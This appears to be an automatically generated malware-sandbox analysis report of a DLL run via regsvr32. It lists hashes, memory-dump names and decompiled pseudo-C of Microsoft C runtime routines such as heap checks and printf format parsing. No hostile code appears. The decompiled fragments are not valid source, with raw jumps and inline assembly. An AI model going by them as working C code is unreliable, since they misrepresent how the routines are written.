                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free_base_malloc_base
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3824334587-0
                                                                                                                                            • Opcode ID: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                                                                                                            • Instruction ID: c402519020b106142e53e4a813d5c541963a88eee12497ce87c085314aa2ccd6
                                                                                                                                            • Opcode Fuzzy Hash: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                                                                                                            • Instruction Fuzzy Hash: FF31EC3290C65AD5E6649F61E44433AA7A1FFC8B98F200935E58E466D9CFBDD480CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$state != NULL
                                                                                                                                            • API String ID: 2123368286-817335350
                                                                                                                                            • Opcode ID: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                                                                                                            • Instruction ID: 04cf202cdc6e40c55fdfa8b1be53c5208a578205809c4d7d8e346f438aefbee0
                                                                                                                                            • Opcode Fuzzy Hash: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                                                                                                            • Instruction Fuzzy Hash: 7F61FB36A1CB59D6EB24DF19E58032977A0FB89B54F204535EA8E47BA4CF3ED441CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                            			E00007FFC7FFC65CFCFF0(intOrPtr _a8) {
                                                                                                                                            				intOrPtr _v24;
                                                                                                                                            				long long _v48;
                                                                                                                                            				long long _v64;
                                                                                                                                            				intOrPtr _t21;
                                                                                                                                            
                                                                                                                                            				_a8 = _t21;
                                                                                                                                            				_v48 = 0;
                                                                                                                                            				_v64 = 0;
                                                                                                                                            				_v24 = _a8;
                                                                                                                                            				_v24 = _v24 - 2;
                                                                                                                                            				if (_v24 - 0x14 > 0) goto 0x65cfd13e;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}







                                                                                                                                            0x7ffc65cfcff0
                                                                                                                                            0x7ffc65cfcff8
                                                                                                                                            0x7ffc65cfd000
                                                                                                                                            0x7ffc65cfd010
                                                                                                                                            0x7ffc65cfd01b
                                                                                                                                            0x7ffc65cfd024
                                                                                                                                            0x7ffc65cfd048

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: ("Invalid signal or error", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c$raise
                                                                                                                                            • API String ID: 2123368286-2245755083
                                                                                                                                            • Opcode ID: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                                                                                                            • Instruction ID: d0f98bdfb39ccd77dde16d4fafc4f0f2a35a0b4d9ec54334863593a37b38974d
                                                                                                                                            • Opcode Fuzzy Hash: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                                                                                                            • Instruction Fuzzy Hash: 45711B3291C79ADAE7648F14E44476AB7A0FB89B54F204935E68E43B98CF3EE444CF11
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HeapPointerValid
                                                                                                                                            • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$L7$LX
                                                                                                                                            • API String ID: 299318057-1988567080
                                                                                                                                            • Opcode ID: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                                                                                                            • Instruction ID: 58939002a5cf5af41c16ba77d58d2ad6b79e9fedd1b0be746cc953f1808264e8
                                                                                                                                            • Opcode Fuzzy Hash: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                                                                                                            • Instruction Fuzzy Hash: F0319233A1C76AD6EB648F15E48523A67A1FF4AB84F205835E64D83BA4DF2ED444CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EncodePointer$_realloc_dbg
                                                                                                                                            • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\onexit.c$}
                                                                                                                                            • API String ID: 429494535-1858280179
                                                                                                                                            • Opcode ID: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                                                                                                            • Instruction ID: 8317dc2456fa1972a0cecbfe277f42c0ba3b086655eac0ec9783577417c9352d
                                                                                                                                            • Opcode Fuzzy Hash: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                                                                                                            • Instruction Fuzzy Hash: 6341C53261DB99C6DA50CB15F48432AB7A0FB89B94F201535EACE43B68DF7ED094CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3799933513-0
                                                                                                                                            • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                                                                                                            • Instruction ID: bf3cbacdffcb8f01db2f81be8618c974bc7b5518e8fee5caa8c76891696ec65f
                                                                                                                                            • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                                                                                                            • Instruction Fuzzy Hash: A051303291DA6AD1E7649F15F4843297BE0FF88B44F201935E68E42BA9DF3ED444DB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: get_int64_arg
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 1967237116-734865713
                                                                                                                                            • Opcode ID: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                                                                                                            • Instruction ID: 461f9ea42edf45097c5dac98167d6ffcdaa9476078ba685efcdf5d16de575c94
                                                                                                                                            • Opcode Fuzzy Hash: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                                                                                                            • Instruction Fuzzy Hash: 33D1067290CA9ACAE774DF15E5403AAB7A0FB84B55F200536E68D82AD9DF7CE440CF14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                            			E00007FFC7FFC65D0DF8D(signed short _a1208, signed int _a1412) {
                                                                                                                                            
                                                                                                                                            				_a1412 = _a1208 & 0x0000ffff;
                                                                                                                                            				_a1412 = _a1412 - 0x41;
                                                                                                                                            				if (_a1412 - 0x37 > 0) goto 0x65d0ea2a;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}



                                                                                                                                            0x7ffc65d0df95
                                                                                                                                            0x7ffc65d0dfa6
                                                                                                                                            0x7ffc65d0dfb5
                                                                                                                                            0x7ffc65d0dfdc

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$7$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 0-1585035072
                                                                                                                                            • Opcode ID: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                                                                                                            • Instruction ID: 31f8df90ed048c8b63d0ccd4f67ff96c7db8cc53f0c3a98630f447b0968fb537
                                                                                                                                            • Opcode Fuzzy Hash: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                                                                                                            • Instruction Fuzzy Hash: FAB1F57250CADACAE774DF55E5403ABB7A0EB84B55F200436EA8D83A99DB7CE440CF14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: (count == 0) || (string != NULL)$(format != NULL)$_vswprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c
                                                                                                                                            • API String ID: 2123368286-1876092940
                                                                                                                                            • Opcode ID: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                                                                                                            • Instruction ID: d4cd426498c7d37bcfe80995e9325188c87b9cba53e55909cc3a9c23d0e97a77
                                                                                                                                            • Opcode Fuzzy Hash: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                                                                                                            • Instruction Fuzzy Hash: A7914C3251CB99CAE7648F14E54436AB7A0F784B94F609935E69E83BE8CF3CD444CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                            			E00007FFC7FFC65D0BE32(signed int _a80, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096) {
                                                                                                                                            
                                                                                                                                            				_a972 = _a696 & 0x000000ff;
                                                                                                                                            				if (_a972 == 0x49) goto 0x65d0beb7;
                                                                                                                                            				if (_a972 == 0x68) goto 0x65d0bfc0;
                                                                                                                                            				if (_a972 == 0x6c) goto 0x65d0be76;
                                                                                                                                            				if (_a972 == 0x77) goto 0x65d0bfcd;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				if ( *_a1096 != 0x6c) goto 0x65d0bea7;
                                                                                                                                            				_a1096 = _a1096 + 1;
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0beb2;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if ( *_a1096 != 0x36) goto 0x65d0bf09;
                                                                                                                                            				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x65d0bf09;
                                                                                                                                            				_a1096 = _a1096 + 2;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				if ( *_a1096 != 0x33) goto 0x65d0bf4c;
                                                                                                                                            				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x65d0bf4c;
                                                                                                                                            				_a1096 = _a1096 + 2;
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				if ( *_a1096 == 0x64) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x69) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x6f) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x75) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x78) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 != 0x58) goto 0x65d0bfae;
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				_a704 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0BB66;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a976 = _a696;
                                                                                                                                            				_a976 = _a976 - 0x41;
                                                                                                                                            				if (_a976 - 0x37 > 0) goto 0x65d0ca31;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}



                                                                                                                                            0x7ffc65d0be3a
                                                                                                                                            0x7ffc65d0be49
                                                                                                                                            0x7ffc65d0be53
                                                                                                                                            0x7ffc65d0be61
                                                                                                                                            0x7ffc65d0be6b
                                                                                                                                            0x7ffc65d0be71
                                                                                                                                            0x7ffc65d0be84
                                                                                                                                            0x7ffc65d0be91
                                                                                                                                            0x7ffc65d0be9d
                                                                                                                                            0x7ffc65d0bea5
                                                                                                                                            0x7ffc65d0beae
                                                                                                                                            0x7ffc65d0beb2
                                                                                                                                            0x7ffc65d0bebb
                                                                                                                                            0x7ffc65d0bed1
                                                                                                                                            0x7ffc65d0bee2
                                                                                                                                            0x7ffc65d0bef0
                                                                                                                                            0x7ffc65d0befc
                                                                                                                                            0x7ffc65d0bf04
                                                                                                                                            0x7ffc65d0bf17
                                                                                                                                            0x7ffc65d0bf28
                                                                                                                                            0x7ffc65d0bf36
                                                                                                                                            0x7ffc65d0bf42
                                                                                                                                            0x7ffc65d0bf4a
                                                                                                                                            0x7ffc65d0bf5a
                                                                                                                                            0x7ffc65d0bf6a
                                                                                                                                            0x7ffc65d0bf7a
                                                                                                                                            0x7ffc65d0bf8a
                                                                                                                                            0x7ffc65d0bf9a
                                                                                                                                            0x7ffc65d0bfaa
                                                                                                                                            0x7ffc65d0bfac
                                                                                                                                            0x7ffc65d0bfae
                                                                                                                                            0x7ffc65d0bfb9
                                                                                                                                            0x7ffc65d0bfbe
                                                                                                                                            0x7ffc65d0bfc7
                                                                                                                                            0x7ffc65d0bfcb
                                                                                                                                            0x7ffc65d0bfd1
                                                                                                                                            0x7ffc65d0bfe6
                                                                                                                                            0x7ffc65d0bff7
                                                                                                                                            0x7ffc65d0c006
                                                                                                                                            0x7ffc65d0c02d

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                                                                                                            • API String ID: 530996419-3826063230
                                                                                                                                            • Opcode ID: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                                                                                                            • Instruction ID: 672101279ee4bffb8c362c9223bc11f43bc5abb258e97f12933024b4198f6548
                                                                                                                                            • Opcode Fuzzy Hash: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                                                                                                            • Instruction Fuzzy Hash: 5F914E6290C6E9CAE7748B54E1843BEBBA4E784B11F600836D68D87AD9CF6CD541CF24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                            			E00007FFC7FFC65D0DDE0(signed int _a80, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544) {
                                                                                                                                            
                                                                                                                                            				_a1408 = _a1208 & 0x0000ffff;
                                                                                                                                            				if (_a1408 == 0x49) goto 0x65d0de66;
                                                                                                                                            				if (_a1408 == 0x68) goto 0x65d0df6f;
                                                                                                                                            				if (_a1408 == 0x6c) goto 0x65d0de24;
                                                                                                                                            				if (_a1408 == 0x77) goto 0x65d0df7c;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x65d0de56;
                                                                                                                                            				_a1544 =  &(_a1544[1]);
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0de61;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x65d0deb8;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x65d0deb8;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x65d0defb;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x65d0defb;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x65d0df5d;
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				_a1216 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0DC41;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a1412 = _a1208 & 0x0000ffff;
                                                                                                                                            				_a1412 = _a1412 - 0x41;
                                                                                                                                            				if (_a1412 - 0x37 > 0) goto 0x65d0ea2a;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}



                                                                                                                                            0x7ffc65d0dde8
                                                                                                                                            0x7ffc65d0ddf7
                                                                                                                                            0x7ffc65d0de01
                                                                                                                                            0x7ffc65d0de0f
                                                                                                                                            0x7ffc65d0de19
                                                                                                                                            0x7ffc65d0de1f
                                                                                                                                            0x7ffc65d0de32
                                                                                                                                            0x7ffc65d0de40
                                                                                                                                            0x7ffc65d0de4c
                                                                                                                                            0x7ffc65d0de54
                                                                                                                                            0x7ffc65d0de5d
                                                                                                                                            0x7ffc65d0de61
                                                                                                                                            0x7ffc65d0de6a
                                                                                                                                            0x7ffc65d0de80
                                                                                                                                            0x7ffc65d0de91
                                                                                                                                            0x7ffc65d0de9f
                                                                                                                                            0x7ffc65d0deab
                                                                                                                                            0x7ffc65d0deb3
                                                                                                                                            0x7ffc65d0dec6
                                                                                                                                            0x7ffc65d0ded7
                                                                                                                                            0x7ffc65d0dee5
                                                                                                                                            0x7ffc65d0def1
                                                                                                                                            0x7ffc65d0def9
                                                                                                                                            0x7ffc65d0df09
                                                                                                                                            0x7ffc65d0df19
                                                                                                                                            0x7ffc65d0df29
                                                                                                                                            0x7ffc65d0df39
                                                                                                                                            0x7ffc65d0df49
                                                                                                                                            0x7ffc65d0df59
                                                                                                                                            0x7ffc65d0df5b
                                                                                                                                            0x7ffc65d0df5d
                                                                                                                                            0x7ffc65d0df68
                                                                                                                                            0x7ffc65d0df6d
                                                                                                                                            0x7ffc65d0df76
                                                                                                                                            0x7ffc65d0df7a
                                                                                                                                            0x7ffc65d0df80
                                                                                                                                            0x7ffc65d0df95
                                                                                                                                            0x7ffc65d0dfa6
                                                                                                                                            0x7ffc65d0dfb5
                                                                                                                                            0x7ffc65d0dfdc

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                                                                                                            • API String ID: 530996419-4206863317
                                                                                                                                            • Opcode ID: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                                                                                                            • Instruction ID: 62c67f164b5ddc89219b7a88f894460bf52ba18fb0ec2245a6e2dd675ee67e08
                                                                                                                                            • Opcode Fuzzy Hash: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                                                                                                            • Instruction Fuzzy Hash: 7B914C6290C6E9CAE7B49F05E54027AB7A1F784B51F604836E6CD87AD8DB3CD850DB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 27%
                                                                                                                                            			E00007FFC7FFC65D0BCFA(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                                                                            				void* _t171;
                                                                                                                                            				char* _t191;
                                                                                                                                            				char* _t192;
                                                                                                                                            
                                                                                                                                            				_a968 = _a696 & 0x000000ff;
                                                                                                                                            				if (_a968 == 0x20) goto 0x65d0bd57;
                                                                                                                                            				if (_a968 == 0x23) goto 0x65d0bd64;
                                                                                                                                            				if (_a968 == 0x2b) goto 0x65d0bd4a;
                                                                                                                                            				if (_a968 == 0x2d) goto 0x65d0bd3d;
                                                                                                                                            				if (_a968 == 0x30) goto 0x65d0bd72;
                                                                                                                                            				goto 0x65d0bd7d;
                                                                                                                                            				_a80 = _a80 | 0x00000004;
